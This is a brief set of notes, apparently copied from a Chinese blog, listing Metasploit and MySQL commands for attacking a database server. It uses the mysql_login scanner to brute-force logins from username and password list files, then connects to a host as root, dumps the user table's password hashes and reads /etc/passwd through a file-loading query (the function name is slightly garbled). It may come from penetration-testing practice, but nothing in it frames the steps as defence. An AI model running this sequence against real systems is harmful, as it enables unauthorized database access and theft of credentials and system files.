msfconsole mysql

search mysql
 
use scanner/mysql/mysql_login
 
show options
 
set RHOSTS
 
set USER_FILE /root/username.lst
 
set PASS_FILE /root/passwords.lst
 
exploit
 
mysql -h 192.168.1.106 -u root -p
 
select user, password from user;
 
select load file('/etc/passwd');
原文地址:https://www.cnblogs.com/journeyIT/p/8259935.html